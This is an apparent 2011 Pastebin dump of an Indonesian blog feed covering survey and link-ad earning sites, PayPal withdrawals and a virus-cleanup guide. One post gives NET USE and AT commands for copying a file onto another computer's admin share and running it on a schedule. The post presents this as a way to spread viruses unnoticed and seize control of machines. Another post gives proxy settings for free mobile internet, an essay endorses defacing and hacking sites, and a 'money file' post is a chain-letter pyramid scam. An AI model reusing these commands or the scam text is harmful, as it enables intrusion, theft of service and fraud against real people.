Want more features on Pastebin? Sign Up, it's FREE!
Guest

http://the-cybers-skills.blogspot.com

By: a guest on Sep 26th, 2011  |  syntax: HTML  |  size: 342.08 KB  |  views: 1,509  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.  
  2.    
  3.  
  4.      
  5.  
  6.        
  7.  
  8.          
  9.  
  10. This is a "feed" of frequently changing content on this site.
  11.  
  12.          
  13.  
  14. You can subscribe to this feed to receive updates when this content changes.
  15.  
  16.        
  17.  
  18.  
  19.  
  20.        
  21.  
  22.    
  23.  
  24.  
  25.    
  26.  
  27.    
  28.  
  29.      
  30.  
  31.        
  32.          
  33.        
  34.        
  35.  
  36.          
  37. The cybers skills
  38.  
  39.          
  40. all about technology, internet, hacking, website, software, downloads, tutorial, online business, money, tips, tricks, computer and cybers
  41.  
  42.        
  43.  
  44.      
  45.  
  46.      
  47. Bukti pembayaran ipanelonline ke 10, 11, 12
  48. Wednesday, September 21, 2011 10:07 PM
  49. Salam cybers!...
  50.  
  51.  
  52. Selamat mencoba!... Klik disini!.
  53. original from : http://www.the-cybers-skills.blogspot.com
  54. Cara menarik atau mencairkan uang di PayPal
  55. Tuesday, September 20, 2011 1:46 AM
  56. Salam cybers!...
  57. Kamu  punya akun PayPal? Sudah pernah mencairkan, menarik atau  men-transfer dollar kamu  ke rekening bank di Indonesia? Jika belum, nihh aku  mau berbagi pengalaman dalam mencairkan dollar di PayPal ke rekening Indonesia. Check this out!.
  58.  
  59.     * Login ke akun PayPal kamu dan halaman pertama yang akan kamu lihat adalah seperti ini.
  60.  
  61. "Pastikan Status akun PayPal kamu sudah Verified dan uangmu di PayPal (PayPal balance) lebih dari $10,00 USD karena itu syarat minimal yang ditentukan oleh PayPal."
  62.  
  63.     *  Setelah semua sudah oke, Klik Witdraw. Maka akan meuncul halaman seperti ini.
  64.  
  65.  
  66.  
  67.     *  Setelah itu, Klik Withdraw funds to your bank account. Maka akan muncul halaman berikut.
  68.  
  69.  
  70.  
  71.  
  72.     *  Isi Amount atau jumlah uang (USD) yang akan di cairkan ke bank di Indonesia, Setelah oke dan yakin dengan jumlah yang akan dicairkan, lalu Klik Continue. Maka akan muncul halaman berikut.
  73.  
  74.  
  75.     * Jika kamu dan yakin dengan Review diatas, lalu Klik Submit. Akan muncul halaman berikut.
  76.  
  77.  
  78.  
  79.     * Jika berhasil, akan muncul halaman seperti diatas.
  80.  
  81. Sekarang tinggal menunggu uangnya sampai ke rekening bank di Indonesia. Biasanya 3 hari sudah sampai.
  82.  
  83.  
  84.  
  85. Ternyata memang benar uang sampai dalam waktu 3 hari!.
  86. Selamat menikmati uangnya!.
  87. original from : http://www.the-cybers-skills.blogspot.com
  88. Bukti pembayaran dari Ipanelonline yang ke 7, 8 dan 9
  89. Saturday, September 17, 2011 2:16 AM
  90. Salam cybers!.. apa kabar guys? semoga kabar baik!. seperti biasa kantong juga bai kan? haha
  91. Pada hari ini aku akan memberikan bukti pembayaran dari Ipanelonline yang saya gembar-gemborkan di Mendapatkan uang puluhan ribu rupiah dalam sehari di ipanelonline kemarin!.
  92.  
  93. Nih dia guys, tapi ini bukan yang pertama kali lho guys ini pembayaran dari Ipanelonline yang ke 7, 8 dan sembilan!. Check this out
  94.  
  95. Yang ke 7.
  96.  
  97.  
  98.  
  99. Yang ke 8.
  100.  
  101.  
  102.  
  103. Yang ke 9.
  104.  
  105.  
  106. Thennnnnnnnnnnnnn.........
  107.  
  108.  
  109.  
  110. Rekening pun nggak sepi!..
  111.  
  112.  So? gimana? pengen seperti aku? bagi seorang mahasiswa yang jauh dari orang tua seperti saya uang segitu lumayan buat parkir di dompet atau di ATM. Klik di http://id.ipanelonline.com/ lihat cara daftarnya di Mendapatkan uang puluhan ribu rupiah dalam sehari di ipanelonline
  113.  
  114. Selamat mencoba!..
  115. original from : http://www.the-cybers-skills.blogspot.com
  116. Mendapatkan uang puluhan ribu rupiah dalam sehari di ipanelonline
  117. Friday, September 09, 2011 7:42 PM
  118. Salam cybers!...
  119. Apa kabar guys? semoga kabar baik, kantong juga baik kan? hehe. Aku punya info menarik nih tentang bisnis survey online, jadi member akan dibayar untuk mengisi survey-survey yang disediakan. Sangat mudah dan semua orang bisa mengikuti, melakukanya dan mengasilkan dollar asal bisa mengoperasikan komputer dan internet. Namanya adalah Ipanelonline sebuah perusahaan market reseach dari cina yang sudah terpercaya dan sudah terbukti membayar para anggotanya.
  120.  
  121. Saya sendiri sudah membuktikanya dan menghasilkan lumayan dollar dari Ipanelonline tersebut dalam waktu yang sangat singkat, kurang dari satu minggu saya sudah mendapat ± 18 $ kalau di rupiahkan sekitar Rp. 160.000an itu lumayan banyak loh, saya hanya meluangkan tidak lebih dari 20 menit tiap harinya untuk mengisi survey-survey yang disediakan terkadang hanya seperti update status di facebook saja.
  122.  
  123. Bagaimana caranya?
  124. Pertama kamu harus punya akun rekening PayPal untuk menerima pembayaranya. Kedua registrasi di http://id.ipanelonline.com lengkapi data-data yang diminta bila sudah klik Pendaftaran, verifikasi registrasi dengan membuka link yang dikirimkan ke email yang kamu daftarkan, kemudian login di form login lengkapi lagi data-data yang dibutuhkan karena akan mempengaruhi jumlah survey yang kita dapat.
  125. Setelah itu mulailah bekerja dengan mengisi survey-survey yang tersedia, maka kamu akan mendapatkan poin yang bisa ditukarkan dengan uang. Segera payout atau cairkan poin tersebut untuk membuktikan kalau yang kamu lakukan benar-benar dibayar!. Jika sudah terbukti, mulailah bekerja keras untuk mendapatkan poin yang lebih banyak!.
  126. Berikut screenshot pembayaran pertama saya dari ipanelonline!.
  127.  
  128.  
  129. Selamat mencoba!...
  130. original from : http://www.the-cybers-skills.blogspot.com
  131. Trik internet gratis 3 / three / tri update 29 agustus 2011
  132. Monday, August 29, 2011 12:34 AM
  133. Salam cybers!... Halo sobat!. udah lama banget ya blog ini nggak unjuk gigi di dunia cyber, hehe semua itu gara-gara domain lama co.cc yang di ban masal oleh google http://www.cyberskills.co.cc/ semenjak itu jadi malas update lagi deh! karena pr dan visitor menurun drastis 90%.
  134. Nah untuk memulai yang baru kali ini The cybers skills akan menyuguhkan postingan tentang trik internet gtratis, karena semakin banyak saja peminatnya dan banyak yang request. Oke, untuk memulai postingan tentang internet gratis kali ini akan dimulai dengan operator 3 / three / tri. yang lain menyusul!.
  135.  
  136. Buat setingan hp:
  137.  
  138. APN: 3gprs
  139.  
  140. Proxy: 217.212.230.34
  141.  
  142. Port: 80
  143.  
  144.  
  145. Buat setingan Operamini handler:
  146.  
  147. Http server: http://m.fb.snaptu.com/@mini5.opera-mini.net:80/
  148.  
  149. Socket server: socket://m.fb.snaptu.com/@mini5.opera-mini.net:1080
  150.  
  151. FrontQuery : www.tri.co.id.0.facebook.co.id@
  152.  
  153. Remove port : beri tanda X
  154.  
  155. Proxy type : pilih Host
  156.  
  157. Proxy Server : m.fb.snaptu.com:80
  158.  
  159.  
  160. Sampai postingan ini muncul trik tersebut masih lancar-lancar saja, buat upload download no problem!.
  161. Buat Operamini handler silahkan cari di google!.
  162. Salam cybers!...
  163. original from : http://www.the-cybers-skills.blogspot.com
  164. Mendapatkan uang dengan mudah lewat Ziddu.com
  165. Monday, May 09, 2011 1:20 AM
  166. Ziddu adalah salah satu dari sekian banyak layanan untuk berbagi file. Salah satu yang membedakan Ziddu dengan yang lain adalah kita akan dibayar ketika ada seseorang yang mendownload file yang kita upload.
  167.  
  168. Bonus akan diberikan setiap ada orang yang men-download file kita sebesar $0.001, maka perhitungannya adalah sebagai berikut :
  169.  
  170.     10000 Unique Downloads: $10
  171.     50000 Unique Downloads: $50
  172.     100000 Unique Downloads: $100
  173.     500000 Unique Downloads: $500
  174.     1000000 Unique Downloads: $1000
  175.  
  176. Maksud dari unique download adalah download dari alamat yang berbeda, jadi kita tidak bisa mengakali dengan men-download file kita sendiri berkali-kali melalui satu komputer yang sama.
  177.  
  178. Bonus juga akan diberika jika kita merekomendasikan orang lain untuk bergabung dengan Ziddu dan besarnya adalah $0.10 sampai $0.30
  179.  
  180. Jadi ada baiknya kita juga promosikan Ziddu kepada orang lain melalui referral link yang telah diberikan kepada kita, atau agar lebih menarik gunakan banner yang telah disediakan,
  181. Klik banner berikut!.
  182.  
  183. original from : http://www.the-cybers-skills.blogspot.com
  184. Mendapatkan uang dengan mudah lewat Linkbucks
  185. Saturday, May 07, 2011 1:07 PM
  186.  Salam cybers...
  187. Linkbucks adalah salah satu website iklan yang memasang iklannya dengan memanfaatkan link. Kenapa link? Karena link adalah faktor utama dalam populeritas suatu website. Makin banyak link ke websitenya maka akan makin populer website tersebut.
  188.  
  189. Linkbucks hampir sama dengan website iklan lain seperti adsense yaitu membayar para pemilik web atau blog untuk menampilkan iklan mereka. Namun teknik yang digunakan sedikit berbeda. Tidak saya jelaskan panjang lebar karena telah banyak dibahas di artikel saya sebelumnya. Linkbucks tidak memasang iklan secara langsung di web atau blog kita, tapi akan menampilkan iklan pada saat link di web kita diklik. Ada jeda beberapa detik untuk menampilkan iklan sebelum link tersebut diarahkan ke link sebenarnya. Jadi istilahnya kalau mo buka link yang kita buat maka si pengunjung akan mampir dulu ke iklan linkbucks. Iklan ini tidak harus ditunggu karena dapat langsung di-skip atau diloncati langsung menuju link sebenarnya tanpa menunggu timeout. Tapi tetap saja si pengunjung akan tetap mampir dulu ke iklan. Kita akan dibayar untuk setiap pengunjung yang mampir ke iklan di www.linkbucks.com dari link milik kita.
  190.  
  191. Keuntungannya sebenarnya menurut saya adalah karena iklan tersebut tidak merusak tampilan web kita. Sehingga cukup memasukkan kode javascript maka otomatis link kita akan dibuat mampir ke iklan sebelum ke link sebenarnya. Namun kita dapat membuat pengecualian domain mana saja yang tidak ingin mampir ke iklan bila link-nya diklik. Saya membuatnya ke domain saya sendiri agar navigasi web saya tidak terganggu oleh iklan. Sedangkan semua link keluar saya buat mampir ke iklan dulu.
  192.  
  193. Untuk membuat link dari Linkbucks ada 3 cara yaitu:
  194.  
  195.     * Membuat link satu-persatu. Cara ini anda dapat gunakan hanya untuk mengenerate alias untuk link anda. Anda cukup memasukkan link sebenarnya pada inputan yang tersedia dan linkbucks akan memberikan link mereka yang akan menjadi link alias untuk link yang sebenarnya.
  196.  
  197.     * Membuat link banyak sekaligus. Bila anda ingin membuat banyak alias link sekaligus anda dapat menggunakan cara ini. Cukup memberi input semua link anda dan linkbucks akan memberikan alias untuk tiap link yang anda masukkan.
  198.  
  199.     * Menggunakan Javascript yang akan mengubah secara otomatis link di halaman web yang kita pasangkan kode javascript linkbucks. Cara paling mudah bagi pemilik web karena tidak direpotkan untuk menggenerate tiap link yang ingin dibuat agar menampilkan iklan.
  200.  
  201.  
  202. Sebenarnya cara menampilkan iklan tidak harus mampir saja. Ada 2 pilihan tampilan iklan yang dapat kita pilih. Namun dari semua pilihan, mampir beberapa detik merupakan pilihan dengan bayaran terbesar. Pilihan lain adalah link akan langsung dibuka namun dengan frame banner pada bagian atas web yang dituju oleh link kita. Selain itu ada juga teknik popup iklan dimana iklan akan dibuka melalui popup window yang muncul saat link kita diklik. Sangat tidak saya rekomendasikan menggunakan pilihan popup iklan karena secara default web browser modern memblok semua pop-up window yang bisa berakibat iklan dari link kita tidak ditampilkan dan kita tidak dibayar.
  203.  
  204. Yang unik adalah kita dapat membuat link kita menjadi iklan dimana saja. Tidak terbatas pada website tertentu saja. Misalnya. Pada forum yang dimana kita terdaftar sebagai usernya. Cukup mengenerate alias link untuk link kita dan paste di forum bila kita ingin berbagi link file, link download, atau link artikel lainnya. Teknik ini cukup ampuh untuk mendatangkan $$ karena biasanya forum memiliki pengunjung yang sangat banyak pada website ini ada pengguna linkbucks yang memposting link yang sangat menarik perhatian para user di forum tempat dia terdaftar dan dalam sebulan dia mampu menghasilkan $100.
  205. Selain dari link kita bisa membuat referal member dimana bila ada user yang signup di linkbucks dari rekomendasi kita maka setiap penghasilan dari member tersebut kita akan mendapatkan bonus 10% dari total penghasilan member yang kita referensikan. Hal ini berlaku juga untuk member tersebut, bila ada user lain mendaftar dengan referensi member kita maka kita akan mendapatkan 5% bonus dari penghasilan user yang direferensikan member kita. Konsepnya adalah 3 tingkat, jadi kita dapat memperoleh penghasilan tambahan dari member yang kita referensikan beserta member lain hingga 3 level dibawah kita. Dengan kata lain bila link kita kurang menguntungkan namun kita memilki member yang trafic-nya cukup baik maka kita juga akan memperoleh keuntungan.
  206.  
  207. Memang bayaran untuk tiap kliknya cukup kecil. Diperlukan lebih dari 500 klik untuk $1. Mungkin kurang atau mungkin lebih. Namun buat saya, paling mudah karena cukup daftar, masukkan kode javascript dan biarkan bekerja tanpa harus update dan diawasi. Sangat menarik dan mudah bukan. Silakan mencoba menjadi member linkbucks Disini.
  208.  
  209. original from : http://www.the-cybers-skills.blogspot.com
  210. 1O Refleksi untuk Hacker Muda
  211. Monday, April 25, 2011 1:28 PM
  212. Hacker and Himself
  213.  
  214. 1.
  215. Waktu cewek gue ngadu kalau FB nya di hacked orang, yang gue lakuin bukan lantas ngehack balik tuh orang melainkan masang sistem keamanan ganda dilaptop cewek gue dan modifikasi sistem security FB nya. Ngebales serangan tsb dengan cara yg sama cuma wasting-time, bakal nunjukin kalau gue gk beda jauh sama tuh orang, punya kemampuan dibawah standar trus ngisengin orang. (Kalau gue yg jadi ceweknya, gue bakal nyalihin cowok gue yang gagal memproteksi account FB gue!!!).
  216.  
  217. 2.
  218. Sial website pribadi gue dihacked, trus berusaha giat untuk pembalasan dendam. Dont be stupid!!!, yang harus dilakukan adalah membangun sistem keamanan baru dengan mempelajari kelemahan-kelemahan yang berhasil ditembus penyerang. Cyber War is not such a stupid thing, it's about how to raising your ability and knowledge through experience, your enemies are those people who mastery the informations, keep them as secret and put so much restriction on internet freedom. Musuhmu adalah hasrat untuk menjaili orang lain dan melakukan tidakan-tindakan negatif untuk kepentingan pribadi merugikan orang lain.
  219.  
  220. 3.
  221. Gak pernah ngisengin komputer `tetangga.' Kenapa mesti menjadikan orang `awam' teknologi sebagai kobran, sama sekali gk ada tantangannya dan gak bertanggungjawab. Kalian cuma membuang-buang waktu mengerahkan kemampuan untuk hal-hal iseng dan gk berguna. Dengan mengobrak-abrik privacy orang lain, hacker tidak jauh berbeda dengan wartawan2 gosip di TV2. Gue lebih milih nebus pertahanan JESTOR, Google Books, etc buat dapetin buku and artikel yang bisa gue bagi-bagiin ke kawan2 cyber. Lebih milih bikin hidden account baru diperpustakaan2 Universitas beken di dunia macem Cambridge, Harvard, ANU, MIT, supaya bisa ngakses informasi-informasi cerdas dan berguna buat ningkatin kemampuan.
  222.  
  223. Hacker and Society
  224.  
  225. 4.
  226. Masih ada yang nanya gimana cara nge-deface web pribadi org lain and masih ada yg nanya gimana cara nyuri password FB, Yahoo, etc org lain, dont be silly you idiot!!! Tujuannya Cuma buat iseng and nguji kemampuan, what a pity. Silahkan uji kemampuan kawan sendiri dengan permittion, kalian bisa belajar banyak dari membangun persekawanan yang positif, and keep on your track. Kalau emang mau disebut keren ikutin gaya hacker gaul Inggris yang nge-deface lebih dr 300 website dan nyisipin pesan anti nuklir, that was awasome!
  227.  
  228. 5.
  229. Cari duit gratis, ngumpulin dolar and belanja pake kartu kredit orang (even bukan punya orang Indonesia) you're not a hacker, you're a muger!! You stupid carder!!. Apa bedanya sama mencuri or ngerampok. Setiap kejahatan diakumulasi dan gk ada satu hal pun yang tidak meperoleh ganjaran kelak. Gak ada cerita carder jadi kaya terus hidup seneng dengan hasil jarahannya, yang ada jadi penghuni penjara. Kalau Anonops berhasil dengan memberi pelajaran untuk VISA, om dan Paypal, yang mereka lakukan adalah memberi pelajaran tentang prinsip keberpihakan capital pada kekuasaan konspirasi dan memperjuangkan Internet Freedom.
  230.  
  231. 6.
  232. Pihak Rektorat dalam waktu dekat akan mengumumkan kebijakan baru yang mewajibkan mahasiswa memenuhi kehadiran dikelas 90 % untuk syarat lulus MK dan minimal grade C. Gak ada cara lain selain nge-hack website kampus, gue pilih site defacement dengan menyusupkan pesan kalau kecerdasan seseorang gak bisa diukur dari kehadiran dikelas sementara mereka jauh lebih bisa mengeksplorasi pengetahuan dan skill diluar wajib absensi.
  233.  
  234. 7.
  235. Salah satu produk `kondom' mempromosikan produk barunya dengan membagi-bagi secara bebas produknya di jalan-jalan dan melakukan poling diwebsite yang isinya mengukur tingkat partisipasi generasi muda dalam penggunaan pengaman dalam hubungan seksual mereka. STUPID, MORON!!! Kampanye merusak generasi MUDA untuk mendorong mereka melakukan seks bebas, GET LOST YOU KONDOM!!!
  236.  
  237. Hacker and Politics
  238.  
  239. 8.
  240. Pengadilan yang isinya mafia-mafia rakus duit ngejatuhin hukuman ke bokap gue karena dituduh spionase pemerintah. Kekuasaan konspirasi akhirnya ngebawa bokap ngedekem di penjara padahal yang gue tahu beliau adalah aktivis politik yang sesungguhnya berteriak untuk keadilan dan kesejahtraan rakyat dengan mengkritisi penguasa. Hack sistem keamanan penjara yang terkomputerisasi!!!! Kantor-kantor polisi yang korup!! dan pengadilan yang `mucikari' alias pelacur hukum kelas elit (Plus..hack hidup dan matinya para koruptor, kejar mereka sampe pintu neraka, musnahkan dan buat mereka melebur di dunia maya!!! Gantung Gayus pake kabel Optik trus kubur jasad busuknya di selat Jawa, siapa tahu akses internet lebih baik)
  241.  
  242. 9.
  243. Ganyang Malaysia!! Kampanye hacker Indonesia yang sesungguhnya mengibarkan bendera perang. Hacking politik (Hacktivism) adalah suatu tindakan dimana kemajuan teknologi dalam hal kemampuan teknis komputer digunakan untuk menyisipkan pesan-pesan humanity (kemanusiaan) -anti penindasan anti totalitalitarian, global justice, HAM dan dunia masa depan yang damai tanpa perang tanpa nuklir, bukan sentimen nasionalisme dengan mengibarkan bendera perang seolah menguji kemampuan siapa yang lebih hebat. Menjadi anak muda yang nasionalis adalah mereka yang terus belajar dan siap mengerahkan kemampuannya untuk menghancurkan `kebodohan' anak-anak bangsa, mereka yang siap mengkontribusikan kemampuannya untuk memajukan dunia IT tanah air dan mengkampanyekan melek teknologi sampai ke pedalaman.
  244.  
  245. 10.
  246. Waktu lagi surfing bebas gue nemuin titik kelemahan sistem keamanan komputer badan inteligen satu negara penguasa yang menjadi arus komunikasi lintas dunia. Intinya mereka sedang mengembangkan senjata nuklir untuk menciptakan tatanan dunia masa depan dibawah kekuasaan negara-negara rakus. leack datanya dan kirim ke wikileaks (Hahaha…kalau yg ini beresiko tinggi hanya dilakukan oleh yang berpengalaman :) dont try this at your computer!!!).
  247.  
  248. Catatan: Dilarang keras memprotes artikel ini, dilarang keras tersinggung dengan kontent artikel ini dan dilarang keras meng-hack penulis artikel ini... :))
  249.  
  250. Best,
  251.  
  252. NOFIA                
  253. original from : http://www.the-cybers-skills.blogspot.com
  254. Mengirimkan File lewat Local Area Network / LAN tanpa diketahui
  255. Saturday, April 23, 2011 8:47 PM
  256. Salam cybers....
  257. Lama tak sapa nih jadi kangen sama Kalian. hehe :P ada ilmu lagi nih kawan bagi kalian yang punya masalah dalam bertukaran file, mengirimkan file atau menyebar file lewat LAN. Banyak sih pren manfaatnya ada yang baik ada juga yang buruk kalian bisa mengirimkan atau menyebarkan Virus, Software, atau file apapun lewat LAN bahkan tanpa diketahui atau minta ijin sama si pemegang komputer hanya dengan menggunakan Command prompt. Ok let's try...
  258.  
  259. Siapkan file yang akan dikirimkan, sebaiknya disimpan di drive c:\ ini akan memudahkan kalian.
  260.  
  261. Buka Command prompt, klik start > Run > ketik "cmd" > Ok.
  262.  
  263. Ketik "NET USE X: \\ NOMOR IP TUJUAN \C$ /user:[user name] [password]" > Enter. perintah tersebut digunakan untuk nge-Mapp drive C:\ menjadi drive X:\ . Drive X:\ adalah drive C:\ yang berada di komputer tujuan.
  264.  
  265. Kemudian ketik "COPY NAMAFILEYANGINGINDIKIRIMKAN X:\ > Enter
  266.  
  267. File sudah berada di drive C:\ komputer tujuan.
  268.  
  269. File tersebut mungkin tidak akan berguna tanpa di eksekusi atau dijalankan, cara menjalankanya adalah dengan cara membuat jadwal pada komputer tersebut. Caranya:
  270.  
  271. Jam yang ada di komputer kita tidak pasti sama dengan jam yang ada di kompuetr tujuan, jadi cara untuk mengetahuinya yaitu Ketikan "AT\\NOMOR IP TUJUAN" maka akan diketahui jam yang ada di komputer tersebut.
  272.  
  273. Lalu ketikan "AT\\NOMOR IP TUJUAN JAM UNTUK MENJALANKAN "C:\NAMA FILE YANG INGIN DI JALANKAN" Contoh: "AT\\202.198.1.12 12:00AM "C:\DATASAYA.EXE"
  274.  
  275. Cara tersebut bisa digunakan untuk menguasai komputer tersebut bahkan jaringan, anda bisa mengirimkan aplikasi remoter untuk mengendalikan komputer tersebut secara penuh layaknya admin. Cara ini mungkin bisa di pake di jaringan Wifi atau hotspot tp saya belum pernah mencobanya.
  276.  
  277. Semoga bermanfaat....
  278. original from : http://www.the-cybers-skills.blogspot.com
  279. Mengatasi dan Membersihkan Virus Shortcut
  280. Tuesday, January 18, 2011 11:24 PM
  281. Salam cybers.....
  282.  
  283.  
  284. Diatas adalah varian baru dari VBScript....
  285.  
  286. Ciri - Ciri :
  287. Membuat file induk database.mdb di My Documents
  288. Membuat file autorun.inf di setiap drive,flash disk, dan folder
  289. Membuat file Thumb.db (hati2 tanpa huruf s) di setiap folder
  290. Membuat file Microsoft.lnk dan New Harry Potter and....lnk di setiap folder
  291. Membuat duplikat setiap folder dengan extensi .lnk
  292. Pada task manager terdapat services wscript.exe
  293.  
  294. Langkah - Langkah :
  295. Matikan System Restore.. >> MY Computer >> klik kanan pilih Properties >> pilih tab System Restore >> aktifkan (centang) Turn Of  System Restore on All Drive
  296. Matikan proses virus wscript.exe (C:\WINDOWS\System32\wscript.exe), bisa menggunakan Process Explorer atau misc. tool pada HijackThis..
  297. Hapus file virus database.mdb di My Documents..
  298. Hapus file duplikat virus..
  299. Gunakan fasilitas search pada Windows..
  300. Pada "More advanced options", pastikan option "Search system folders" dan "Search
  301. hidden files and folders" keduanya terpilih..
  302. Search file dengan nama autorun.inf ukurannya 8 KB
  303. Search file dengan nama Thumb.db ukurannya 8 KB
  304. Search file dengan ekstensi .lnk ukurannya 1 KB
  305. Hapus semua file yang ditemukan..
  306. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis (program Hijack This bisa anda download DISINI)
  307. >> Do A System Scan Only >> pilih Scan >> Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb >> klik Fix Checked
  308.  
  309.  
  310.  
  311.  
  312.  
  313. Thx to Bro Kocak Gober @ kaskus
  314.  
  315. Semoga bisa membantu....
  316. original from : http://www.the-cybers-skills.blogspot.com
  317. File Penghasil Uang
  318. Saturday, April 23, 2011 11:01 PM
  319. PRAKTEK
  320. NYATA
  321. UNTUK SEMUA KALANGAN ! ! ! ! !
  322. TUA, MUDA, PELAJAR, MAHASISWA, PENGANGGURAN, DLL..
  323. DAPATKAN
  324. PULUHAN JUTA SEBULAN
  325. Hanya Dengan Menjadi PESERTA ke-3
  326. Dan Menyebar file INI
  327. Pernahkah anda berpikir
  328. Kapan saya kaya??...??
  329. Kalau untuk makan saja selalu pas-pasan apalagi
  330. Bermimpi membeli Hp, ,motor, mobil bahkan rumah
  331. Dengan Uang SENDIRI ! ! !
  332. Baca informasi ini ! ! !
  333. Jangan anggap remeh informasi ini bila anda memang  
  334. tidak punya kesempatan di luar sana…
  335. INI SOLUSI ! ! !
  336.  
  337. MAKSUD DAN TUJUAN
  338. Agar tercipta kesejahteraan taraf hidup anggota dengan menikmati giliran mendapatkan uang banyak dengan cara saling member, maka akan mendapatkan balasan berlipat ganda.
  339.  
  340. PENDAHULUAN
  341. Program ini adalah dari anda dan untuk anda, sehingga di butuhkan kerjasama antar anggota agar program investasi ini berjalan dan dapat memberikan penghasilan yang besar bagi semua pesertanya.
  342.  
  343. KESAKSIAN DAN KISAH NYATA
  344.  
  345. Dari Hj. Nur Arini, Pengajar di Surabaya:
  346. Alhamdulillah, berkat file yang saya temukan dirental pengetikan dekat sekolah, akhirnya dengan harap-harap cemas dan penuh penasaran, akhirnya Saya putuskan untuk mencoba mengikuti program uang kaget ini. Karena waktu itu saya masih penasaran, maka saya memutuskan untuk tidak menceritakan terlebih dahulu ke orang lain sebelum saya membuktikanya terkecuali suami, dan inilah awal keberhasilan saya dengan adanya dukungan suami. Hanya dengan mentransfer ketiga peserta, masing2 @Rp. 20.000,- ditambah biaya transfer masing2 @Rp. 2.500,- dan scan bukti setoran Rp. 2.500,-… Kemudian saya sebarkan diwarnet2, rental pengetikan. Alhamdulillah, saldo saya dalam 10 (SEPULUH) hari pertama bertambah Rp. 600.000,- dan sungguh kaget begitugenap sebulan, total yang saya dapatkan sebesar Rp. 20.260.000,- … Kini saya tak lagi ragu berbagi pengalaman dengan mengajak teman. Namun demikian Saya yakin saldo tabungan Saya akan terus bertambah. Trimakasih sebesar2nya buat siapapun yang membuat system ini… wassalam.
  347.  
  348. Dari Andy Ruly, Mahasiswa di Bandung:
  349. Terimakasih kepada sahabat seperantauan yang telah mengajak program investasi ini kepada saya, akhirnya Saya mengikuti program yang aneh ini . Setelah saya mengkopi file, mentransfer ketiga peserta lain, dan menjadi anggota ke 3, lalu menyebarkan di setiap warnet manapun Saya berada, benar – benar aneh!! Saldo Mandiri – ku bertambah sebesar Rp. 9.480.000,- di bulan pertama dan di bulan kedua menjadi Rp. 36.860.000,-
  350.  
  351. Dari Indriati Ningrum, S.E ibu Rumah Tangga di Semarang:
  352. Rasanya ini mimpi!! Saya seorang ibu rumah tangga yang baru menikah, dan hidup pas-pasan. Saya menemukan file ini disalah satu warnet di Surabaya kota tempat suami Saya bekerja. Saya baca, Saya pelajari sistemnya baik2 sampai selesai dan waktu itu saya berfikir tak akan menyia-nyiakan kesempatan ini dengan menjadi peserta ke3. Entahlah saat file ini ditemukan oleh “anda”, Saya telah menjadi peserta yang keberapa atau Saya telah tergusur oleh peserta lain. Yang perlu digaris bawahi saya di besarkan oleh anda dan Saya harus berbagi keberuntungan dengan Anda yang baru menemukan file ini. Kalaupun program ini bohong, berarti saya kehilangan Rp. 60.000,- plus ongkos transfer dan scan slip bukti transfer, katakanlah Rp. 70.000,- Ya saya piker tak apalah, yang namanya usaha pasti harus ada modal dan punya resiko. Lagipula system ini hanya memerlukan modal kecil tapi menjanjikan penghasilan yang besar. Maka kata terakhir… Saya harus berani mengambil resiko!!!
  353. Emmmm,,, eh ternyata setelah Saya menjadi anggota ke3 dan Saya sebar ke warnet2 di Surabaya, satu minggu kemudian ada uang yang masuk rekening Saya meski tak banyak, Cuma Rp. 120.000,- saja. Hal ini berarti, system dapat berjalan dan benar – benar nyata. Akhirnya saya tambah yakin dan rajin menyebarkan file ke internet ataupun rental dimanapun Saya menjumpai warnet dan saya sempat. Wah..wah masya Allah!! Beberapa bulan kemudian, saat terakhir kali saya membuat kesaksian ini, saldo BNI Saya menjadi Rp. 38.080.000,-. Saya sangtat berterimakasih kepada siapa saja yang telah membuat program uang kaget ini. Saya doakan agar sehat dan bahagia selalu.
  354.  
  355. INFORMASI
  356. Mungkin anda salah seorang yang menunda-nunda memulai usaha dengan berbagai alas an untuk tidak melakukan, yang hanya akan menjauhkan dari keberhasilan Anda. Sementara banyak orang diluar sana yang hidup bermewah-mewahan, punya rumah, mobil, bisa mendapatkan apa yang mereka inginkan. Apa anda rela hanya sebagai penonton melihat kesuksesan orang lain sementara Anda selalu kekurangan walau sudah bekerja keras atau bahkan saat ini Anda pengangguran
  357.  
  358. Kesuksesan bukan milik orang-orang tertentu kesuksesan adalah milik Anda dan siapa saja yang benar-benar menyadari, menginginkan dan memperjuangkan dengan sepenuh hati.
  359.  
  360. Inilah satu-satunya cara mudah bagi Anda memperoleh kesempatan untuk MEMBALIK KEADAAN ANDA dengan cara cepat dan Halal
  361. Hanya dengan menjadi anggota ke3 dan meyebar file ini
  362. File ditemukan orang lain, orang lain menjadi anggota, dan rekening Anda akan terus meluap!!!!.
  363. !!TERBUKTI DAN PERCAYALAH!!
  364. DENGAN KOMITMEN, MENJUNJUNG TINGGI SISTEM,  
  365. SALING BERGANDENGAN TANGAN SATU SAMA LAIN, SALING MEMBANTU & BERBAGI REJEKI,
  366. MAKA PENDAPATAN YANG BESAR TAK MUSTAHIL KITA DAPATKAN
  367. SYARAT:
  368.  
  369.   1.
  370.      Anda hanya harus  memiliki no Rekening BANK (bank manapun), agar anda dapat ditransfer  oleh sesame anggota lainya. Kalau belum punya segeralah membuat  rekening, karena peluang belum tentu datang dua kali.
  371.   2.
  372.      Tidak boleh saling  saling menjatuhkan,  DILARANG KERAS MENGIKUTI PROGRAM INI BAGI ANDA  YANG:
  373.  
  374. Tidak mengikuti peraturan dengan membuang kesempatan orang lain demi kerakusan Anda sendiri, ketahuilah informasi ini sampai ketangan Anda berkat mereka yang telah berani mengorbankan uang dan tenaga demi kesempatan yang sangat mereka inginkan.
  375. KAPAN LAGI ANDA PUNYA KESEMPATAN MEMPEROLEH PULUHAN BAHKAN RATUSAN JUTA HANYA DALAM BEBERAPA BULAN????
  376. ANDA RELA BANTING TULANG TIAP HARI DEMI UANG PULUHAN RIBU, Kenapa tidak anda coba hanya dengan investasi sebesar 70 ribu dan menyebarkan file INI. Anda berkesempatan besar mendapatkan puluhan juta INI NYATA KESEMPATAN SEKALI SEUMUR HIDUP ANDA…..
  377.  
  378. DOWNLOAD FILE DISINI....
  379. original from : http://www.the-cybers-skills.blogspot.com
  380. Dua Klik Facebookers Untuk Palestina
  381. Saturday, April 23, 2011 10:02 PM
  382. Salam cybers!.
  383. Biadab israel.. Dimana hak asasi manusia di Palestina?
